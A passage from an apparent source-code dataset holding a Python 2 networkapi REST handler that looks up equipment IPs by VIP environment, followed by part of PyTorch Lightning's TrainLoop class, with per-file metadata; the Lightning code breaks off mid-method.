list() lista_ipsv6_equip = list() # GET DIVISAO DC AND AMBIENTE_LOGICO OF NET4 AND NET6 lista_amb_div_4 = list() lista_amb_div_6 = list() for net in evip.networkipv4_set.select_related( 'vlan', 'ambiente' ).all(): dict_div_4 = dict() dict_div_4['divisao_dc'] = net.vlan.ambiente.divisao_dc_id dict_div_4[ 'ambiente_logico'] = net.vlan.ambiente.ambiente_logico_id if dict_div_4 not in lista_amb_div_4: lista_amb_div_4.append(dict_div_4) for net in evip.networkipv6_set.select_related( 'vlan', 'ambiente' ).all(): dict_div_6 = dict() dict_div_6['divisao_dc'] = net.vlan.ambiente.divisao_dc_id dict_div_6[ 'ambiente_logico'] = net.vlan.ambiente.ambiente_logico_id if dict_div_6 not in lista_amb_div_6: lista_amb_div_6.append(dict_div_6) # Get all IPV4's Equipment for ipequip in equip.ipequipamento_set.select_related( 'ip', 'vlan', 'ambiente' ).all(): if ipequip.ip not in lista_ips_equip: for dict_div_amb in lista_amb_div_4: # if ipequip.ip.networkipv4.ambient_vip is not None and # ipequip.ip.networkipv4.ambient_vip.id == evip.id: if (ipequip.ip.networkipv4.vlan.ambiente.divisao_dc.id == dict_div_amb.get('divisao_dc') and ipequip.ip.networkipv4.vlan.ambiente.ambiente_logico.id == dict_div_amb.get('ambiente_logico')): lista_ips_equip.append(ipequip.ip) # Get all IPV6'S Equipment for ipequip in equip.ipv6equipament_set.select_related( 'ip', 'vlan', 'ambiente' ).all(): if ipequip.ip not in lista_ipsv6_equip: for dict_div_amb in lista_amb_div_6: # if ipequip.ip.networkipv6.ambient_vip is not None and # ipequip.ip.networkipv6.ambient_vip.id == evip.id: print ipequip.ip.networkipv6.vlan.ambiente.divisao_dc.id print dict_div_amb.get('divisao_dc') if (ipequip.ip.networkipv6.vlan.ambiente.divisao_dc.id == dict_div_amb.get('divisao_dc') and ipequip.ip.networkipv6.vlan.ambiente.ambiente_logico.id == dict_div_amb.get('ambiente_logico')): lista_ipsv6_equip.append(ipequip.ip) # lists and dicts for return lista_ip_entregue = list() lista_ip6_entregue = list() for ip in lista_ips_equip: dict_ips4 = dict() dict_network = dict() dict_ips4['id'] = ip.id dict_ips4['ip'] = '%s.%s.%s.%s' % ( ip.oct1, ip.oct2, ip.oct3, ip.oct4) dict_network['id'] = ip.networkipv4_id dict_network['network'] = '%s.%s.%s.%s' % ( ip.networkipv4.oct1, ip.networkipv4.oct2, ip.networkipv4.oct3, ip.networkipv4.oct4) dict_network['mask'] = '%s.%s.%s.%s' % ( ip.networkipv4.mask_oct1, ip.networkipv4.mask_oct2, ip.networkipv4.mask_oct3, ip.networkipv4.mask_oct4) dict_ips4['network'] = dict_network lista_ip_entregue.append(dict_ips4) for ip in lista_ipsv6_equip: dict_ips6 = dict() dict_network = dict() dict_ips6['id'] = ip.id dict_ips6['ip'] = '%s:%s:%s:%s:%s:%s:%s:%s' % ( ip.block1, ip.block2, ip.block3, ip.block4, ip.block5, ip.block6, ip.block7, ip.block8) dict_network['id'] = ip.networkipv6.id dict_network['network'] = '%s:%s:%s:%s:%s:%s:%s:%s' % ( ip.networkipv6.block1, ip.networkipv6.block2, ip.networkipv6.block3, ip.networkipv6.block4, ip.networkipv6.block5, ip.networkipv6.block6, ip.networkipv6.block7, ip.networkipv6.block8) dict_network['mask'] = '%s:%s:%s:%s:%s:%s:%s:%s' % ( ip.networkipv6.block1, ip.networkipv6.block2, ip.networkipv6.block3, ip.networkipv6.block4, ip.networkipv6.block5, ip.networkipv6.block6, ip.networkipv6.block7, ip.networkipv6.block8) dict_ips6['network'] = dict_network lista_ip6_entregue.append(dict_ips6) lista_ip_entregue = lista_ip_entregue if len( lista_ip_entregue) > 0 else None lista_ip6_entregue = lista_ip6_entregue if len( lista_ip6_entregue) > 0 else None if (lista_ip_entregue is None and lista_ip6_entregue is None): raise IpNotFoundByEquipAndVipError( None, 'Ip não encontrado com equipamento %s e ambiente vip %s' % (equip_name, id_evip)) return self.response(dumps_networkapi({'ipv4': lista_ip_entregue, 'ipv6': lista_ip6_entregue})) except IpNotFoundByEquipAndVipError: return self.response_error(317, equip_name, id_evip) except InvalidValueError, e: return self.response_error(269, e.param, e.value) except NetworkIPv4NotFoundError: return self.response_error(281) except EquipamentoNotFoundError: return self.response_error(117, ip_map.get('id_equipment')) except EnvironmentVipNotFoundError: return self.response_error(283) except UserNotAuthorizedError: return self.not_authorized() except XMLError, x: self.log.error(u'Error reading the XML request.') return self.response_error(3, x) except (IpError, NetworkIPv4Error, EquipamentoError, GrupoError), e: self.log.error(e) return self.response_error(1)
45.548246
213
0.625325
import logging from networkapi.admin_permission import AdminPermission from networkapi.ambiente.models import EnvironmentVip from networkapi.auth import has_perm from networkapi.equipamento.models import Equipamento from networkapi.equipamento.models import EquipamentoError from networkapi.equipamento.models import EquipamentoNotFoundError from networkapi.exception import EnvironmentVipNotFoundError from networkapi.exception import InvalidValueError from networkapi.grupo.models import GrupoError from networkapi.infrastructure.xml_utils import dumps_networkapi from networkapi.infrastructure.xml_utils import loads from networkapi.infrastructure.xml_utils import XMLError from networkapi.ip.models import IpError from networkapi.ip.models import IpNotFoundByEquipAndVipError from networkapi.ip.models import NetworkIPv4Error from networkapi.ip.models import NetworkIPv4NotFoundError from networkapi.rest import RestResource from networkapi.rest import UserNotAuthorizedError from networkapi.util import is_valid_int_greater_zero_param from networkapi.util import is_valid_regex from networkapi.util import is_valid_string_maxsize from networkapi.util import is_valid_string_minsize class IPEquipEvipResource(RestResource): log = logging.getLogger('IPEquipEvipResource') def handle_post(self, request, user, *args, **kwargs): """Handles POST requests to get all Ips (v4) or (v6) of equip on Divisao DC and Ambiente Logico of fisrt Network4 and 6 (if exists) of Environment Vip. URL: ip/getbyequipandevip/ """ self.log.info('Get Ips by Equip - Evip') try: if not has_perm(user, AdminPermission.IPS, AdminPermission.READ_OPERATION): raise UserNotAuthorizedError( None, u'User does not have permission to perform the operation.') xml_map, attrs_map = loads(request.raw_post_data) networkapi_map = xml_map.get('networkapi') if networkapi_map is None: msg = u'There is no value to the networkapi tag of XML request.' self.log.error(msg) return self.response_error(3, msg) ip_map = networkapi_map.get('ip_map') if ip_map is None: msg = u'There is no value to the ip tag of XML request.' self.log.error(msg) return self.response_error(3, msg) id_evip = ip_map.get('id_evip') equip_name = ip_map.get('equip_name') if not is_valid_int_greater_zero_param(id_evip): self.log.error( u'Parameter id_evip is invalid. Value: %s.', id_evip) raise InvalidValueError(None, 'id_evip', id_evip) if not is_valid_string_minsize(equip_name, 3) or not is_valid_string_maxsize(equip_name, 80) or not is_valid_regex(equip_name, '^[A-Z0-9-_]+$'): self.log.error( u'Parameter equip_name is invalid. Value: %s', equip_name) raise InvalidValueError(None, 'equip_name', equip_name) evip = EnvironmentVip.get_by_pk(id_evip) equip = Equipamento.get_by_name(equip_name) lista_ips_equip = list() lista_ipsv6_equip = list() lista_amb_div_4 = list() lista_amb_div_6 = list() for net in evip.networkipv4_set.select_related( 'vlan', 'ambiente' ).all(): dict_div_4 = dict() dict_div_4['divisao_dc'] = net.vlan.ambiente.divisao_dc_id dict_div_4[ 'ambiente_logico'] = net.vlan.ambiente.ambiente_logico_id if dict_div_4 not in lista_amb_div_4: lista_amb_div_4.append(dict_div_4) for net in evip.networkipv6_set.select_related( 'vlan', 'ambiente' ).all(): dict_div_6 = dict() dict_div_6['divisao_dc'] = net.vlan.ambiente.divisao_dc_id dict_div_6[ 'ambiente_logico'] = net.vlan.ambiente.ambiente_logico_id if dict_div_6 not in lista_amb_div_6: lista_amb_div_6.append(dict_div_6) for ipequip in equip.ipequipamento_set.select_related( 'ip', 'vlan', 'ambiente' ).all(): if ipequip.ip not in lista_ips_equip: for dict_div_amb in lista_amb_div_4: # if ipequip.ip.networkipv4.ambient_vip is not None and # ipequip.ip.networkipv4.ambient_vip.id == evip.id: if (ipequip.ip.networkipv4.vlan.ambiente.divisao_dc.id == dict_div_amb.get('divisao_dc') and ipequip.ip.networkipv4.vlan.ambiente.ambiente_logico.id == dict_div_amb.get('ambiente_logico')): lista_ips_equip.append(ipequip.ip) # Get all IPV6'S Equipment for ipequip in equip.ipv6equipament_set.select_related( 'ip', 'vlan', 'ambiente' ).all(): if ipequip.ip not in lista_ipsv6_equip: for dict_div_amb in lista_amb_div_6: print ipequip.ip.networkipv6.vlan.ambiente.divisao_dc.id print dict_div_amb.get('divisao_dc') if (ipequip.ip.networkipv6.vlan.ambiente.divisao_dc.id == dict_div_amb.get('divisao_dc') and ipequip.ip.networkipv6.vlan.ambiente.ambiente_logico.id == dict_div_amb.get('ambiente_logico')): lista_ipsv6_equip.append(ipequip.ip) lista_ip_entregue = list() lista_ip6_entregue = list() for ip in lista_ips_equip: dict_ips4 = dict() dict_network = dict() dict_ips4['id'] = ip.id dict_ips4['ip'] = '%s.%s.%s.%s' % ( ip.oct1, ip.oct2, ip.oct3, ip.oct4) dict_network['id'] = ip.networkipv4_id dict_network['network'] = '%s.%s.%s.%s' % ( ip.networkipv4.oct1, ip.networkipv4.oct2, ip.networkipv4.oct3, ip.networkipv4.oct4) dict_network['mask'] = '%s.%s.%s.%s' % ( ip.networkipv4.mask_oct1, ip.networkipv4.mask_oct2, ip.networkipv4.mask_oct3, ip.networkipv4.mask_oct4) dict_ips4['network'] = dict_network lista_ip_entregue.append(dict_ips4) for ip in lista_ipsv6_equip: dict_ips6 = dict() dict_network = dict() dict_ips6['id'] = ip.id dict_ips6['ip'] = '%s:%s:%s:%s:%s:%s:%s:%s' % ( ip.block1, ip.block2, ip.block3, ip.block4, ip.block5, ip.block6, ip.block7, ip.block8) dict_network['id'] = ip.networkipv6.id dict_network['network'] = '%s:%s:%s:%s:%s:%s:%s:%s' % ( ip.networkipv6.block1, ip.networkipv6.block2, ip.networkipv6.block3, ip.networkipv6.block4, ip.networkipv6.block5, ip.networkipv6.block6, ip.networkipv6.block7, ip.networkipv6.block8) dict_network['mask'] = '%s:%s:%s:%s:%s:%s:%s:%s' % ( ip.networkipv6.block1, ip.networkipv6.block2, ip.networkipv6.block3, ip.networkipv6.block4, ip.networkipv6.block5, ip.networkipv6.block6, ip.networkipv6.block7, ip.networkipv6.block8) dict_ips6['network'] = dict_network lista_ip6_entregue.append(dict_ips6) lista_ip_entregue = lista_ip_entregue if len( lista_ip_entregue) > 0 else None lista_ip6_entregue = lista_ip6_entregue if len( lista_ip6_entregue) > 0 else None if (lista_ip_entregue is None and lista_ip6_entregue is None): raise IpNotFoundByEquipAndVipError( None, 'Ip não encontrado com equipamento %s e ambiente vip %s' % (equip_name, id_evip)) return self.response(dumps_networkapi({'ipv4': lista_ip_entregue, 'ipv6': lista_ip6_entregue})) except IpNotFoundByEquipAndVipError: return self.response_error(317, equip_name, id_evip) except InvalidValueError, e: return self.response_error(269, e.param, e.value) except NetworkIPv4NotFoundError: return self.response_error(281) except EquipamentoNotFoundError: return self.response_error(117, ip_map.get('id_equipment')) except EnvironmentVipNotFoundError: return self.response_error(283) except UserNotAuthorizedError: return self.not_authorized() except XMLError, x: self.log.error(u'Error reading the XML request.') return self.response_error(3, x) except (IpError, NetworkIPv4Error, EquipamentoError, GrupoError), e: self.log.error(e) return self.response_error(1)
false
true
f705d82868da78fc4b8e5a14a1c63f8b5d2c006e
39,980
py
Python
pytorch_lightning/trainer/training_loop.py
songwanguw/pytorch-lightning
64da9c9d87ac1c106d94310c4d90668fbafbb2cf
[ "Apache-2.0" ]
null
null
null
pytorch_lightning/trainer/training_loop.py
songwanguw/pytorch-lightning
64da9c9d87ac1c106d94310c4d90668fbafbb2cf
[ "Apache-2.0" ]
1
2020-11-11T11:36:38.000Z
2020-11-11T11:36:38.000Z
pytorch_lightning/trainer/training_loop.py
songwanguw/pytorch-lightning
64da9c9d87ac1c106d94310c4d90668fbafbb2cf
[ "Apache-2.0" ]
null
null
null
# Copyright The PyTorch Lightning team. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from contextlib import contextmanager from copy import copy, deepcopy import numpy as np import torch import torch.distributed as torch_distrib from pytorch_lightning.callbacks import ModelCheckpoint from pytorch_lightning.core.lightning import LightningModule from pytorch_lightning.core.memory import ModelSummary from pytorch_lightning.core.step_result import EvalResult, Result from pytorch_lightning.trainer.states import TrainerState from pytorch_lightning.trainer.supporters import TensorRunningAccum, Accumulator from pytorch_lightning.utilities import parsing, AMPType from pytorch_lightning.utilities.distributed import rank_zero_info, rank_zero_warn from pytorch_lightning.utilities.exceptions import MisconfigurationException from pytorch_lightning.utilities.memory import recursive_detach from pytorch_lightning.utilities.model_utils import is_overridden from pytorch_lightning.utilities.parsing import AttributeDict from pytorch_lightning.utilities.warning_utils import WarningCache class TrainLoop: def __init__(self, trainer): self.trainer = trainer self.early_stopping_accumulator = None self.checkpoint_accumulator = None self.accumulated_loss = None self.warning_cache = WarningCache() self._teardown_already_run = False self.running_loss = TensorRunningAccum(window_length=20) self.automatic_optimization = True self._curr_step_result = None self._cur_grad_norm_dict = None def on_trainer_init( self, max_epochs, min_epochs, max_steps, min_steps, num_sanity_val_steps, automatic_optimization ): self.trainer.global_step = 0 self.trainer.current_epoch = 0 self.trainer.interrupted = False self.trainer.should_stop = False self.trainer._state = TrainerState.INITIALIZING self.trainer.total_batch_idx = 0 self.trainer.batch_idx = 0 self.trainer.num_training_batches = 0 self.trainer.train_dataloader = None self.automatic_optimization = automatic_optimization self.trainer.max_epochs = max_epochs self.trainer.min_epochs = min_epochs self.trainer.max_steps = max_steps self.trainer.min_steps = min_steps if num_sanity_val_steps == -1: self.trainer.num_sanity_val_steps = float("inf") else: self.trainer.num_sanity_val_steps = num_sanity_val_steps @property def num_optimizers(self): num_optimizers = len(self.get_optimizers_iterable()) return num_optimizers def should_skip_training(self): if self.trainer.current_epoch >= self.trainer.max_epochs: return True if self.trainer.limit_train_batches == 0: return True return False def on_train_start(self): # clear cache before training if self.trainer.on_gpu and self.trainer.root_gpu is not None: # use context because of: # https://discuss.pytorch.org/t/out-of-memory-when-i-use-torch-cuda-empty-cache/57898 with torch.cuda.device(f"cuda:{self.trainer.root_gpu}"): torch.cuda.empty_cache() # hook self.trainer.call_hook("on_train_start") def setup_fit(self, model, train_dataloader, val_dataloaders, datamodule): # bind logger and other properties self.trainer.model_connector.copy_trainer_model_properties(model) # clean hparams if hasattr(model, "hparams"): parsing.clean_namespace(model.hparams) # links data to the trainer self.trainer.data_connector.attach_data(model, train_dataloader, val_dataloaders, datamodule) # check that model is configured correctly self.trainer.config_validator.verify_loop_configurations(model) def setup_training(self, model: LightningModule): """Sanity check a few things before starting actual training. Args: model: The model to run sanity test on. """ # -------------------------- # Setup?? # -------------------------- ref_model = model if self.trainer.data_parallel: ref_model = model.module # set the ranks and devices self.trainer.accelerator_backend.dist.rank = self.trainer.global_rank self.trainer.accelerator_backend.dist.device = ref_model.device # give model convenience properties ref_model.trainer = self.trainer # set local properties on the model self.trainer.model_connector.copy_trainer_model_properties(ref_model) # init amp. Must be done here instead of __init__ to allow ddp to work if self.trainer.amp_backend == AMPType.NATIVE and self.trainer.precision == 16 and not self.trainer.use_tpu: self.trainer.scaler = torch.cuda.amp.GradScaler() # log hyper-parameters if self.trainer.logger is not None: # save exp to get started (this is where the first experiment logs are written) self.trainer.logger.log_hyperparams(ref_model.hparams_initial) self.trainer.logger.log_graph(ref_model) self.trainer.logger.save() # wait for all to join if on distributed self.trainer.accelerator_backend.barrier("setup_training") # register auto-resubmit when on SLURM self.trainer.slurm_connector.register_slurm_signal_handlers() # -------------------------- # Pre-train # -------------------------- # on pretrain routine start self.trainer.on_pretrain_routine_start(ref_model) if self.trainer.is_function_implemented("on_pretrain_routine_start"): ref_model.on_pretrain_routine_start() # print model summary if self.trainer.is_global_zero and self.trainer.weights_summary is not None and not self.trainer.testing: if self.trainer.weights_summary in ModelSummary.MODES: ref_model.summarize(mode=self.trainer.weights_summary) else: raise MisconfigurationException("weights_summary can be None, " + ", ".join(ModelSummary.MODES)) # track model now. # if cluster resets state, the model will update with the saved weights self.trainer.model = model # restore training and model before hpc is called self.trainer.checkpoint_connector.restore_weights(model) # on pretrain routine end self.trainer.on_pretrain_routine_end(ref_model) if self.trainer.is_function_implemented("on_pretrain_routine_end"): ref_model.on_pretrain_routine_end() def on_train_end(self): if self._teardown_already_run: return self._teardown_already_run = True # trigger checkpoint check. need to temporarily decrease the global step to avoid saving duplicates # when a checkpoint was saved at the last step self.trainer.global_step -= 1 self.check_checkpoint_callback(should_save=True, is_last=True) self.trainer.global_step += 1 # hook self.trainer.call_hook("on_train_end") # kill loggers if self.trainer.logger is not None: self.trainer.logger.finalize("success") # summarize profile results if self.trainer.global_rank == 0: self.trainer.profiler.describe() # give accelerators a chance to finish self.trainer.accelerator_backend.on_train_end() # clear mem if self.trainer.on_gpu: model = self.trainer.get_model() model.cpu() torch.cuda.empty_cache() def check_checkpoint_callback(self, should_save, is_last=False): # TODO bake this logic into the checkpoint callback if should_save and self.trainer.checkpoint_connector.has_trained: checkpoint_callbacks = [c for c in self.trainer.callbacks if isinstance(c, ModelCheckpoint)] if is_last and any(c.save_last for c in checkpoint_callbacks): rank_zero_info("Saving latest checkpoint...") model = self.trainer.get_model() [c.on_validation_end(self.trainer, model) for c in checkpoint_callbacks] def on_train_epoch_start(self, epoch): # update training progress in trainer self.trainer.current_epoch = epoch model = self.trainer.get_model() # reset train dataloader if self.trainer.reload_dataloaders_every_epoch: self.trainer.reset_train_dataloader(model) # set seed for distributed sampler (enables shuffling for each epoch) try: self.trainer.train_dataloader.sampler.set_epoch(epoch) except Exception: pass # changing gradient according accumulation_scheduler self.trainer.accumulation_scheduler.on_epoch_start(self.trainer, self.trainer.get_model()) # stores accumulated grad fractions per batch self.accumulated_loss = TensorRunningAccum(window_length=self.trainer.accumulate_grad_batches) # structured result accumulators for callbacks self.early_stopping_accumulator = Accumulator() self.checkpoint_accumulator = Accumulator() # hook self.trainer.call_hook("on_epoch_start") self.trainer.call_hook("on_train_epoch_start") def on_train_batch_end(self, epoch_output, epoch_end_outputs, batch, batch_idx, dataloader_idx): # hook self.trainer.call_hook('on_batch_end') self.trainer.call_hook('on_train_batch_end', epoch_end_outputs, batch, batch_idx, dataloader_idx) # figure out what to track for epoch end self.track_epoch_end_reduce_metrics(epoch_output, epoch_end_outputs) # reset batch logger internals self.trainer.logger_connector.on_train_batch_end() def reset_train_val_dataloaders(self, model): if not self.trainer.reload_dataloaders_every_epoch: self.trainer.reset_train_dataloader(model) if self.trainer.val_dataloaders is None and not self.trainer.reload_dataloaders_every_epoch: self.trainer.reset_val_dataloader(model) def track_epoch_end_reduce_metrics(self, epoch_output, epoch_end_outputs): # track the outputs to reduce at the end of the epoch for opt_idx, opt_outputs in enumerate(epoch_end_outputs): # with 1 step (no tbptt) don't use a sequence at epoch end if isinstance(opt_outputs, list) and len(opt_outputs) == 1 and not isinstance(opt_outputs[0], Result): opt_outputs = opt_outputs[0] epoch_output[opt_idx].append(opt_outputs) def get_optimizers_iterable(self): """ Generates an iterable with (idx, optimizer) for each optimizer. """ if not self.trainer.optimizer_frequencies: # call training_step once per optimizer return list(enumerate(self.trainer.optimizers)) optimizer_freq_cumsum = np.cumsum(self.trainer.optimizer_frequencies) optimizers_loop_length = optimizer_freq_cumsum[-1] current_place_in_loop = self.trainer.total_batch_idx % optimizers_loop_length # find optimzier index by looking for the first {item > current_place} in the cumsum list opt_idx = np.argmax(optimizer_freq_cumsum > current_place_in_loop) return [[opt_idx, self.trainer.optimizers[opt_idx]]] def on_after_backward(self, training_step_output, batch_idx, untouched_loss): is_result_obj = isinstance(training_step_output, Result) if is_result_obj: training_step_output.detach() else: training_step_output.batch_loss = training_step_output.batch_loss.detach() # insert after step hook self.trainer.call_hook("on_after_backward") # when in dev debugging track the losses self.trainer.dev_debugger.track_train_loss_history(batch_idx, untouched_loss.detach()) def _check_training_step_output(self, training_step_output): if isinstance(training_step_output, torch.Tensor) and not self.automatic_optimization: if training_step_output.grad_fn is None: # TODO: Find why - RuntimeError: Expected to mark a variable ready only once ... raise MisconfigurationException("In manual optimization, `training_step` should not return a Tensor") def training_step(self, split_batch, batch_idx, opt_idx, hiddens): # give the PL module a result for logging model_ref = self.trainer.get_model() with self.trainer.profiler.profile("model_forward"): args = self.build_train_args(split_batch, batch_idx, opt_idx, hiddens) # manually capture logged metrics model_ref._current_fx_name = 'training_step' training_step_output = self.trainer.accelerator_backend.training_step(args) self.trainer.logger_connector.cache_logged_metrics() self._check_training_step_output(training_step_output) training_step_output = self.trainer.call_hook("training_step_end", training_step_output) training_step_output_for_epoch_end, training_step_output = self._process_training_step_output( training_step_output, split_batch ) is_result_obj = isinstance(training_step_output, Result) if training_step_output_for_epoch_end is None: return None # enable empty loss when using manual opt closure_loss = None untouched_loss = None if self.trainer.train_loop.automatic_optimization: # accumulate loss # (if accumulate_grad_batches = 1 no effect) if is_result_obj: closure_loss = training_step_output.minimize else: closure_loss = training_step_output.batch_loss closure_loss = closure_loss / self.trainer.accumulate_grad_batches # the loss will get scaled for amp. avoid any modifications to it untouched_loss = closure_loss.detach().clone() # result result = AttributeDict( closure_loss=closure_loss, loss=untouched_loss, training_step_output=training_step_output, training_step_output_for_epoch_end=training_step_output_for_epoch_end, hiddens=training_step_output.hiddens, ) return result def _process_training_step_output(self, training_step_output, split_batch): training_step_output_for_epoch_end = training_step_output # enable validation_step return None if training_step_output_for_epoch_end is None: return None, None # ----------------------------------------- # process result return (DEPRECATE in 1.0) # ----------------------------------------- if isinstance(training_step_output, Result): training_step_output_for_epoch_end = self._process_result(training_step_output, split_batch) return training_step_output_for_epoch_end, training_step_output # ----------------------------------------- # process hybrid (1.0) # ----------------------------------------- # no need for these checks in 1.0.0 # TODO: remove checks in 1.0.0 is_tensor = isinstance(training_step_output_for_epoch_end, torch.Tensor) is_1_0_output = is_tensor or ("log" not in training_step_output and "progress_bar" not in training_step_output) if is_1_0_output: return self._process_training_step_output_1_0(training_step_output, split_batch) # ----------------------------------------- # process old dict (deprecate 1.0) # ----------------------------------------- training_step_output = self.trainer.process_dict_result(training_step_output, train=True) training_step_output = AttributeDict( batch_loss=training_step_output[0], pbar_on_batch_end=training_step_output[1], log_metrics=training_step_output[2], callback_metrics=training_step_output[3], hiddens=training_step_output[4], ) # if the user decides to finally reduce things in epoch_end, save raw output without graphs if isinstance(training_step_output_for_epoch_end, torch.Tensor): training_step_output_for_epoch_end = training_step_output_for_epoch_end.detach() else: training_step_output_for_epoch_end = recursive_detach(training_step_output_for_epoch_end) return training_step_output_for_epoch_end, training_step_output def _process_training_step_output_1_0(self, training_step_output, split_batch): result = self.trainer.get_model()._results loss = None hiddens = None # handle dict return if isinstance(training_step_output, dict): loss = training_step_output.pop("loss", None) hiddens = training_step_output.pop("hiddens", None) result["extra"] = training_step_output # handle scalar return elif isinstance(training_step_output, torch.Tensor): loss = training_step_output result["extra"] = {} # map to results under the hood result.minimize = loss result.hiddens = hiddens # track batch for manual reduction with result result.track_batch_size(len(split_batch)) # track metrics without grads for epoch reduction training_step_output_for_epoch_end = copy(result) training_step_output_for_epoch_end.detach() if self.trainer.move_metrics_to_cpu: training_step_output_for_epoch_end.cpu() # what flows back into the system training_step_output = result return training_step_output_for_epoch_end, training_step_output def _process_result(self, training_step_output, split_batch): training_step_output.track_batch_size(len(split_batch)) m = """ TrainResult and EvalResult were deprecated in 0.9.1 and support will drop in 1.0.0. Use self.log and .write from the LightningModule to log metrics and write predictions. training_step can now only return a scalar (for the loss) or a dictionary with anything you want. Option 1: return loss Option 2: return {'loss': loss, 'anything_else': ...} Option 3: return {'loss': loss, 'hiddens': hiddens, 'anything_else': ...} """ rank_zero_warn(m) # don't allow EvalResult in the training_step if isinstance(training_step_output, EvalResult): raise MisconfigurationException( "training_step cannot return EvalResult, " "use a dict or TrainResult instead" ) training_step_output_for_epoch_end = copy(training_step_output) training_step_output_for_epoch_end.detach() return training_step_output_for_epoch_end def optimizer_step(self, optimizer, opt_idx, batch_idx, train_step_and_backward_closure): with self.trainer.profiler.profile("optimizer_step"): # optimizer step lightningModule hook self.trainer.accelerator_backend.optimizer_step( optimizer, batch_idx, opt_idx, train_step_and_backward_closure ) def on_before_zero_grad(self, optimizer): self.trainer.call_hook('on_before_zero_grad', optimizer) def optimizer_zero_grad(self, batch_idx, optimizer, opt_idx): self.trainer.accelerator_backend.optimizer_zero_grad(batch_idx, optimizer, opt_idx) def track_and_norm_grad(self, optimizer): # track gradient norms grad_norm_dic = self._track_gradient_norm() # clip gradients self.trainer.accelerator_backend.clip_gradients(optimizer) self._cur_grad_norm_dict = grad_norm_dic def _track_gradient_norm(self): grad_norm_dict = {} if (self.trainer.global_step + 1) % self.trainer.log_every_n_steps == 0: if float(self.trainer.track_grad_norm) > 0: model = self.trainer.get_model() grad_norm_dict = model.grad_norm(self.trainer.track_grad_norm) return grad_norm_dict def process_hiddens(self, opt_closure_result): hiddens = opt_closure_result.hiddens if isinstance(opt_closure_result.training_step_output, Result): opt_closure_result.training_step_output_for_epoch_end.drop_hiddens() return hiddens def tbptt_split_batch(self, batch): splits = [batch] if self.trainer.truncated_bptt_steps is not None: model_ref = self.trainer.get_model() with self.trainer.profiler.profile("tbptt_split_batch"): splits = model_ref.tbptt_split_batch(batch, self.trainer.truncated_bptt_steps) return splits def run_training_epoch(self): # get model model = self.trainer.get_model() # modify dataloader if needed (ddp, etc...) train_dataloader = self.trainer.accelerator_backend.process_dataloader(self.trainer.train_dataloader) # track epoch output epoch_output = [[] for _ in range(self.num_optimizers)] # enable profiling for the dataloader train_dataloader = self.trainer.data_connector.get_profiled_train_dataloader(train_dataloader) dataloader_idx = 0 should_check_val = False for batch_idx, (batch, is_last_batch) in train_dataloader: self.trainer.batch_idx = batch_idx # ------------------------------------ # TRAINING_STEP + TRAINING_STEP_END # ------------------------------------ batch_output = self.run_training_batch(batch, batch_idx, dataloader_idx) # when returning -1 from train_step, we end epoch early if batch_output.signal == -1: break # only track outputs when user implements training_epoch_end # otherwise we will build up unnecessary memory epoch_end_outputs = self.process_train_step_outputs( batch_output.training_step_output_for_epoch_end, self.early_stopping_accumulator, self.checkpoint_accumulator, ) # hook # TODO: add outputs to batches self.on_train_batch_end(epoch_output, epoch_end_outputs, batch, batch_idx, dataloader_idx) # ----------------------------------------- # SAVE METRICS TO LOGGERS # ----------------------------------------- self.trainer.logger_connector.log_train_step_metrics(batch_output) # ----------------------------------------- # VALIDATE IF NEEDED + CHECKPOINT CALLBACK # ----------------------------------------- should_check_val = self.should_check_val_fx(batch_idx, is_last_batch) if should_check_val: self.trainer.run_evaluation(test_mode=False) # reset stage to train self.trainer.logger_connector.set_stage("train") # ----------------------------------------- # SAVE LOGGERS (ie: Tensorboard, etc...) # ----------------------------------------- self.save_loggers_on_train_batch_end() # update LR schedulers monitor_metrics = deepcopy(self.trainer.logger_connector.callback_metrics) self.update_train_loop_lr_schedulers(monitor_metrics=monitor_metrics) self.trainer.checkpoint_connector.has_trained = True # max steps reached, end training if self.trainer.max_steps is not None and self.trainer.max_steps == self.trainer.global_step + 1: accumulation_done = self._accumulated_batches_reached() # Ensure accumulation across batches has completed before breaking loop if accumulation_done: break # end epoch early # stop when the flag is changed or we've gone past the amount # requested in the batches if self.trainer.should_stop: break self.trainer.total_batch_idx += 1 # stop epoch if we limited the number of training batches if (batch_idx + 1) >= self.trainer.num_training_batches: break # progress global step according to grads progress self.increment_accumulated_grad_global_step() # epoch end hook self.run_on_epoch_end_hook(epoch_output) # log epoch metrics self.trainer.logger_connector.log_train_epoch_end_metrics( epoch_output, self.checkpoint_accumulator, self.early_stopping_accumulator, self.num_optimizers ) # when no val loop is present or fast-dev-run still need to call checkpoints self.check_checkpoint_callback(not (should_check_val or is_overridden('validation_step', model))) # increment the global step once # progress global step according to grads progress self.increment_accumulated_grad_global_step() def run_training_batch(self, batch, batch_idx, dataloader_idx): # track grad norms grad_norm_dic = {} # bookkeeping using_results_obj = False self.trainer.hiddens = None # track all outputs across time and num of optimizers batch_outputs = [[] for _ in range(len(self.get_optimizers_iterable()))] if batch is None: return AttributeDict(signal=0, grad_norm_dic=grad_norm_dic) # hook response = self.trainer.call_hook("on_batch_start") if response == -1: return AttributeDict(signal=-1, grad_norm_dic=grad_norm_dic) # hook response = self.trainer.call_hook("on_train_batch_start", batch, batch_idx, dataloader_idx) if response == -1: return AttributeDict(signal=-1, grad_norm_dic=grad_norm_dic) # lightning module hook splits = self.tbptt_split_batch(batch) for split_idx, split_batch in enumerate(splits): # create an iterable for optimizers and loop over them for opt_idx, optimizer in self.prepare_optimizers(): # toggle model params + set info to logger_connector self.run_train_split_start(split_idx, split_batch, opt_idx, optimizer) if self.should_accumulate(): # For gradient accumulation # ------------------- # calculate loss (train step + train step end) # ------------------- # perform dpp sync only when performing optimizer_step with self.block_ddp_sync_behaviour(): self.training_step_and_backward(split_batch, batch_idx, opt_idx, optimizer, self.trainer.hiddens) batch_outputs = self._process_closure_result( batch_outputs=batch_outputs, opt_idx=opt_idx, ) # ------------------------------ # BACKWARD PASS # ------------------------------ # gradient update with accumulated gradients else: if self.automatic_optimization: def train_step_and_backward_closure(): result = self.training_step_and_backward( split_batch, batch_idx, opt_idx, optimizer, self.trainer.hiddens ) return None if result is None else result.loss # optimizer step self.optimizer_step(optimizer, opt_idx, batch_idx, train_step_and_backward_closure) else: self._curr_step_result = self.training_step( split_batch, batch_idx, opt_idx, self.trainer.hiddens ) if self._curr_step_result is None: # user decided to skip 